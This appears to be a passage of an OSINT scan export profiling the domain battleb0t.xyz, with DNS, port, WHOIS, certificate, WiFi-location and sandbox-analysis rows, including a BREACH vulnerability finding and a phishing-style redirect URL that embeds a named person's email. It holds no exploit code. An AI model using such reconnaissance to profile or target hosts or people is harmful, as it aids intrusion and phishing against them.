3e:5a:b9:ce:51:09:75:8e:66:10:ba:ac:7a:bf:80:93:80:59:
81:68:1a:f1:4b:74:5d:68:98:fd:b9:d6:3c:7d:27:77:0e:6b:
c3:83:68:c1:53:51:8c:92:a8:96:95:40:f7:6c:ab:93:47:5e:
47:42:3f:43:61:57:3a:c1:fd:4a:c1:60:c0:f5:9f:e5:3f:aa:
cd:53:b5:a3:5d:e8:f4:0a:26:e5:70:df:34:b0:ae:1c:99:2a:
3c:31:a1:a9:06:b4:05:fd:9b:44:cb:42:87:c4:a0:d2:e7:7a:
95:fc:6a:ad:e6:f1:50:0d:21:cd:f5:24:0f:dc:98:36:59:3b:
40:6e:0f:4b:38:de:68:41:9a:1e:f9:be:5b:6a:36:f0:9b:22:
e3:a1:e1:ad:96:f6:ba:a2:d1:f4:e2:12:cb:ab:1f:bb:9a:53:
07:6b:08:bd:4c:58:68:74:4f:75:3c:83:28:de:71:51:c8:1c:
8f:ca:5e:df:81:b4:f2:74:1f:18:af:29:fa:69:d6:b5:65:a9:
11:13:ef:a4
| battleb0t.xyz |
| 2023-05-12 02:55:11 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 87.248.157.102:2083 | 87.248.157.102 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 10:37:58 (Net ID: 00:02:2D:28:06:03) | 37.7642, -122.3993 |
| 2023-05-12 02:44:09 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 2 | 1 | 1 | 0 | None | github.io | battleb0t.xyz |
| 2023-05-12 02:44:17 | IPv6 Address | No | DNS Resolver | 0 | 0 | 3 | 0 | None | 2606:50c0:8002::153 | www.battleb0t.xyz |
| 2023-05-12 02:56:57 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | fluid.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:c7:00:14:21:71:88:e2:18:10:f8:e3:ee:d1:89:37:10:7b
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 27 01:46:47 2022 GMT
Not After : Mar 27 01:46:46 2023 GMT
Subject: CN=fluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:ca:91:c0:24:2c:ac:ca:ae:72:a2:1c:76:2b:73:
ee:03:78:0b:80:eb:3e:1e:2f:33:3d:ee:c9:08:d3:
24:62:ca:69:54:4a:4f:62:ee:85:3e:9e:5e:5f:d1:
1f:ab:8a:39:77:32:f2:c3:16:74:4d:2e:2a:61:7c:
7c:02:16:fd:f8:90:cd:06:b2:e9:f4:43:77:1b:75:
bb:be:c8:56:44:f6:50:11:ac:06:ec:e8:59:ef:64:
25:2f:4d:3f:96:fc:de:28:67:0a:4e:3f:7e:0e:35:
82:50:a2:e2:53:60:28:9a:07:c8:48:6d:b6:14:30:
5d:26:53:a7:34:c5:04:39:e7:67:e1:8b:e5:5d:a5:
3a:24:32:e3:b6:35:44:1a:60:82:6c:43:b7:4d:91:
70:e8:77:c6:32:fc:99:9f:ad:b8:12:75:4d:70:f3:
52:73:ab:3d:62:1e:0f:a1:00:40:14:f2:ee:4f:92:
e4:8c:8a:19:22:54:b9:c3:71:e1:6b:29:43:5b:56:
a9:e7:cc:16:78:2e:25:bc:fa:16:51:9d:87:b3:64:
aa:85:a8:c4:c7:1b:38:de:e1:9c:ae:93:7d:3f:98:
02:a9:aa:fa:8c:80:52:99:2e:98:ff:77:3d:76:8b:
8f:32:cd:03:00:51:9a:81:df:0d:68:7a:8d:16:fa:
b6:b1
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
6C:34:7D:03:48:53:73:CF:0D:0C:39:44:A5:D1:A0:E8:F3:90:7F:11
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:fluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
3e:fe:f9:21:a8:b9:ff:5b:d7:4e:56:e9:01:36:22:e4:80:7b:
32:28:4f:35:ce:d9:fe:79:61:21:91:08:a4:5a:99:cb:49:8d:
59:33:d8:1c:63:9a:1f:c2:49:d5:16:41:55:df:2b:23:f2:e9:
b3:cc:0e:45:14:b2:fe:94:7d:98:ee:51:3e:fe:8e:d3:e9:26:
e4:d9:13:e1:5b:9d:72:18:78:d0:8e:68:17:2a:3e:77:ec:ab:
7d:44:bc:01:fc:dc:0f:8f:d3:cb:10:ee:22:15:6e:05:13:f7:
e6:22:b4:eb:f4:fb:8e:2b:69:d7:32:d7:d5:70:69:43:51:d5:
4b:6b:0b:f8:e5:1a:2e:d7:2d:1d:78:46:8f:ca:f0:7d:23:fd:
88:d0:03:3c:9a:6c:c7:d3:59:0a:bf:a1:53:93:a9:52:44:05:
4e:9a:e7:34:e3:cf:4e:d3:8f:b2:a4:32:fc:7a:56:50:19:02:
1d:b0:d0:f6:ba:1e:0f:f4:0e:1e:fe:53:40:02:f1:88:3c:f3:
9b:b6:f5:bd:4d:b4:cd:f4:5c:5c:d1:5e:1f:d8:bc:e4:0a:75:
d6:3d:a2:7f:13:a1:4d:66:3a:7b:eb:4a:cf:7e:00:5d:ee:3b:
c3:4d:5a:49:d1:0b:e5:67:dc:0a:d3:3c:d7:f1:60:9d:30:79:
0a:39:a4:60
|
| 2023-05-12 02:44:13 | IP Address | No | DNS Resolver | 107 | 0 | 1 | 0 | None | 185.199.109.153 | battleb0t.xyz |
| 2023-05-12 03:08:50 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 35.229.48.124 | 35.229.48.116 |
| 2023-05-12 03:00:50 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 000.github.io | 185.199.111.153 |
| 2023-05-12 02:58:43 | Vulnerability - CVE Medium | Yes | Tool - testssl.sh | 0 | 2 | 1 | 0 | None | CVE-2013-3587
https://nvd.nist.gov/vuln/detail/CVE-2013-3587
Score: 5.9
Description: The HTTPS protocol, as used in unspecified web applications, can encrypt compressed data without properly obfuscating the length of the unencrypted data, which makes it easier for man-in-the-middle attackers to obtain plaintext secret values by observing length differences during a series of guesses in which a string in an HTTP request URL potentially matches an unknown string in an HTTP response body, aka a "BREACH" attack, a different issue than CVE-2012-4929. | ayhu.xyz |
| 2023-05-12 03:31:33 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | abuse@namecheap.com | Domain Name: ASHU.XYZ
Registry Domain ID: D279374777-CNIC
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: https://namecheap.com
Updated Date: 2023-03-28T08:17:54.0Z
Creation Date: 2022-03-03T09:34:10.0Z
Registry Expiry Date: 2024-03-03T23:59:59.0Z
Registrar: Namecheap
Registrar IANA ID: 1068
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant State/Province: Capital Region
Registrant Country: IS
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: GRACE.NS.CLOUDFLARE.COM
Name Server: LOGAN.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:17:37.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain name: ashu.xyz
Registry Domain ID: D279374777-CNIC
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2023-02-22T23:31:01.00Z
Creation Date: 2022-03-03T09:34:10.00Z
Registrar Registration Expiration Date: 2024-03-03T23:59:59.00Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region
Registrant Postal Code: 101
Registrant Country: IS
Registrant Phone: +354.4212434
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: 4f516d38c2f942669e9c1663e414ae75.protect@withheldforprivacy.com
Registry Admin ID:
Admin Name: Redacted for Privacy
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin Street: Kalkofnsvegur 2
Admin City: Reykjavik
Admin State/Province: Capital Region
Admin Postal Code: 101
Admin Country: IS
Admin Phone: +354.4212434
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: 4f516d38c2f942669e9c1663e414ae75.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: 4f516d38c2f942669e9c1663e414ae75.protect@withheldforprivacy.com
Name Server: grace.ns.cloudflare.com
Name Server: logan.ns.cloudflare.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-11T07:17:37.40Z <<<
For more information on Whois status codes, please visit https://icann.org/epp |
| 2023-05-12 02:55:05 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 188.114.97.1:2052 | 188.114.97.1 |
| 2023-05-12 02:54:30 | Physical Location | No | Censys | 1 | 0 | 3 | 0 | None | Frankfurt am Main, Hesse, 60306, Germany, Europe | 64.226.81.43 |
| 2023-05-12 02:45:10 | Raw Data from RIRs | No | Hybrid Analysis | 1 | 0 | 1 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'https://zip.co/us/quadpay-terms-of-service', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'http://bcpzonasegurabeta.viabcp.com', u'type': u'extracted', u'verdict': u'malicious'}]}, u'total_processes': 21, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'http://kekw.battleb0t.xyz/jar', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7052:120:WilError_01"\n "InternetShortcutMutex"\n "Local\\SM0:348:120:WilError_01"\n "SM0:348:120:WilError_01"\n "SM0:348:304:WilStaging_02"\n "Local\\SM0:348:304:WilStaging_02"\n "SM0:7052:120:WilError_01"\n "SM0:7052:304:WilStaging_02"\n "Local\\SM0:7052:120:WilError_01"\n "Local\\SM0:7052:304:WilStaging_02"\n "ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7052:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:7052:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:7052:120:WilError_01"'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-220', u'name': u'Executes batch file', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1059', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1059', u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Process "msedge.exe" with commandline "--single-argument http://kekw.battleb0t.xyz/jar" (UID: 00000000-00007052)'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"64.226.81.43:49750"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"kekw.battleb0t.xyz"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Asset Store\\assets.db\\000003.log]- [targetUID: 00000000-00007052]\n "safety_tips.pb" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\SafetyTips\\2844\\safety_tips.pb]- [targetUID: 00000000-00007052]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00007052]\n "Session_13324411891984663" has type "data"- [targetUID: N/A]\n "manifest.fingerprint" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Edge Shopping\\2.0.2353.0\\manifest.fingerprint]- [targetUID: 00000000-00007052]\n "c920e640-3cd4-4291-b5a7-5ed9af660f2d.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]\n "ae4685c3-b06f-45e7-8054-1aa0597e7deb.tmp" has type "very short file (no magic)"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\ae4685c3-b06f-45e7-8054-1aa0597e7deb.tmp]- [targetUID: 00000000-00007052]\n "8c133cbc-cb4f-4494-9a53-681a41c38ec8.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\8c133cbc-cb4f-4494-9a53-681a41c38ec8.tmp]- [targetUID: 00000000-00007052]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00007052]\n "Last Browser" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Last Browser]- [targetUID: 00000000-00007052]\n "manifest.json" has type "JSON data"- Location: [%TEMP%\\7052_1944693387\\manifest.json]- [targetUID: 00000000-00007052]\n "product_page.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7052_1268572528\\product_page.js]- [targetUID: 00000000-00007052]\n "1200c81a-5f8f-40d4-9791-b368d00c99a1.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\1200c81a-5f8f-40d4-9791-b368d00c99a1.tmp]- [targetUID: 00000000-00007052]\n "Tabs_13324411893998198" has type "data"- [targetUID: N/A]\n "643a517a-ab51-4a47-a7fa-e8480b929b43.tmp" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\643a517a-ab51-4a47-a7fa-e8480b929b43.tmp]- [targetUID: 00000000-00007052]\n "LOG" has type "ASCII text"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\EdgePushStorageWithConnectTokenAndKey\\LOG]- [targetUID: 00000000-00007052]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://www.w3.org/2000/svg"\n Pattern match: "https://easylist.to/"\n Pattern match: "https://github.com/easylist"\n Pattern match: "http://kekw.battleb0t.xyz/jar"\n Pattern match: "Math.PI/180"\n Pattern match: "https://creativecommons.org/"\n Pattern match: "http://kekw.battleb0t.xyz"\n Pattern match: "https://creativecommons.org/compatiblelicenses"\n Pattern match: "https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wtc3?ver=79e5,PORTRAIT:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqHh?ver=0f07,copyright:Yuanping"\n Pattern match: "www.playstation.com},{applied_policy:block,domain:bing.com},{applied_policy:block,domain:browserbench.org},{applied_policy:block,domain:www.principledtechnologies.com},{applied_policy:block,domain:web.basemark.com},{applie"\n Pattern match: "https://*excel.officeapps.live.com/*,https://*onenote.officeapps.live.com/*,https://*powerpoint.officeapps.live.com/*,https://*word-edit.officeapps.live.com/*,https://*excel.partner.officewebapps.cn/*,https://*onenote.partner.officewebapps.cn/*,"\n Pattern match: "kekw.battleb0t.xyz/jar"\n Pattern match: "http://schemas.microsoft.com/SMI/2005/WindowsSettings"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-40', u'name': u'Drops script (vb/js) files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 1, u'type': 8, u'description': u'"product_page.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7052_1268572528\\product_page.js]- [targetUID: 00000000-00007052]\n "shoppingfre.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7052_1268572528\\shoppingfre.js]- [targetUID: 00000000-00007052]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Edge Shopping\\2.0.2353.0\\edge_driver.js]- [targetUID: 00000000-00007052]\n "edge_checkout_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7052_1268572528\\edge_checkout_page_validator.js]- [targetUID: 00000000-00007052]\n "adblock_snippet.js" has type "ASCII text with very long lines with no line terminators"- Location: [%TEMP%\\7052_16790919\\adblock_snippet.js]- [targetUID: 00000000-00007052]\n "auto_open_controller.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7052_1268572528\\auto_open_controller.js]- [targetUID: 00000000-00007052]\n "edge_confirmation_page_validator.js" has type "Unknown"- Location: [%TEMP%\\7052_1268572528\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00007052]\n "shopping.js" has type "Unknown"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Edge Shopping\\2.0.2353.0\\shopping.js]- [targetUID: 00000000-00007052]\n "edge_tracking_page_validator.js" has type "Unknown"- Location: [%TEMP%\\7052_1268572528\\edge_tracking_page_validator.js]- [targetUID: 00000000-00007052]\n "shopping_iframe_driver.js" has type "Unknown"- Location: [%TEMP%\\7052_1268572528\\shopping_iframe_driver.js]- [targetUID: 00000000-00007052]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-14', u'name': u'Found potential IP address in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 1, u'type': 2, u'description': u'Potential IP "3.0.0.8" found in string ""version": "3.0.0.8""\n Potential IP "10.34.0.45" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\10.34.0.45"\n Potential IP "10.34.0.45" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Unindexed Rules\\10.34.0.45\\LICENSE"\n Potential IP "3.0.0.8" found in string "\xef\xbb\xbf{ "description": "AutofillCore data component", "name": "AutofillCore", "version": "3.0.0.8"}"\n Potential IP "5.1.0.0 | battleb0t.xyz |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 7567 3371 (Net ID: 00:00:C5:F7:76:3C) | 41.8781, -87.6298 |
| 2023-05-12 02:56:52 | Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | nwapi.battleb0t.xyz | [{"url": "https://nwapi.battleb0t.xyz", "firewall": "Cloudflare", "detected": true, "manufacturer": "Cloudflare Inc."}, {"url": "https://nwapi.battleb0t.xyz", "firewall": "None", "detected": false, "manufacturer": "None"}] |
| 2023-05-12 02:46:17 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | Cross-platform software | cdn-185-199-111-153.github.com |
| 2023-05-12 03:34:36 | BGP AS Membership | No | RIPE | 0 | 0 | 4 | 0 | None | 44486 | 45.131.109.0/24 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | default (Net ID: 00:11:6B:13:88:06) | 50.8897, 6.0563 |
| 2023-05-12 03:04:46 | Hosting Provider | No | Hosting Provider Identifier | 0 | 0 | 3 | 0 | None | PEER 1: http://www.peer1.com/ | 64.226.81.43 |
| 2023-05-12 03:01:00 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.105): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | My Passport (2.4 GHz) - 07B79D (Net ID: 00:00:C0:07:B7:9D) | 37.7813933,-122.3918002 |
| 2023-05-12 03:22:23 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | MCName (Minecraft) (Category: gaming)
https://mcname.info/en/search?q=battleb0t | battleb0t |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Audiojungle (Category: music)
https://audiojungle.net/user/login | login |
| 2023-05-12 02:54:23 | Open TCP Port | No | Censys | 0 | 0 | 4 | 0 | None | 2600:1f18:2489:8201::c8:80 | 2600:1f18:2489:8201::c8 |
| 2023-05-12 03:24:49 | Country | No | Country Name Extractor | 0 | 0 | 4 | 0 | None | Iceland | Domain Name: CLOUDWAYSAPPS.COM
Registry Domain ID: 1695307151_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2022-09-12T18:44:13Z
Creation Date: 2012-01-04T12:17:34Z
Registry Expiry Date: 2028-01-04T12:17:34Z
Registrar: NameCheap, Inc.
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.6613102107
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: NS-1086.AWSDNS-07.ORG
Name Server: NS-2016.AWSDNS-60.CO.UK
Name Server: NS-222.AWSDNS-27.COM
Name Server: NS-854.AWSDNS-42.NET
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T02:59:31Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain name: cloudwaysapps.com
Registry Domain ID: 1695307151_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2022-06-22T11:27:03.11Z
Creation Date: 2012-01-04T12:17:34.00Z
Registrar Registration Expiration Date: 2028-01-04T12:17:34.00Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region
Registrant Postal Code: 101
Registrant Country: IS
Registrant Phone: +354.4212434
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: 28efa154c841448e9e98cc948672b2d4.protect@withheldforprivacy.com
Registry Admin ID:
Admin Name: Redacted for Privacy
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin Street: Kalkofnsvegur 2
Admin City: Reykjavik
Admin State/Province: Capital Region
Admin Postal Code: 101
Admin Country: IS
Admin Phone: +354.4212434
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: 28efa154c841448e9e98cc948672b2d4.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: 28efa154c841448e9e98cc948672b2d4.protect@withheldforprivacy.com
Name Server: ns-222.awsdns-27.com
Name Server: ns-854.awsdns-42.net
Name Server: ns-1086.awsdns-07.org
Name Server: ns-2016.awsdns-60.co.uk
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-11T06:41:09.59Z <<<
For more information on Whois status codes, please visit https://icann.org/epp |
| 2023-05-12 02:49:22 | Raw Data from RIRs | No | Hybrid Analysis | 1 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://llink.to/?u=https%3A%2F%2Frabetsanatkoosha.com%2FSNS%2Fvitesco.com%2Frobert.scheubeck%40vitesco.com', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "Local\\InternetShortcutMutex"\n "IsoScope_86c_IESQMMUTEX_0_303"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n 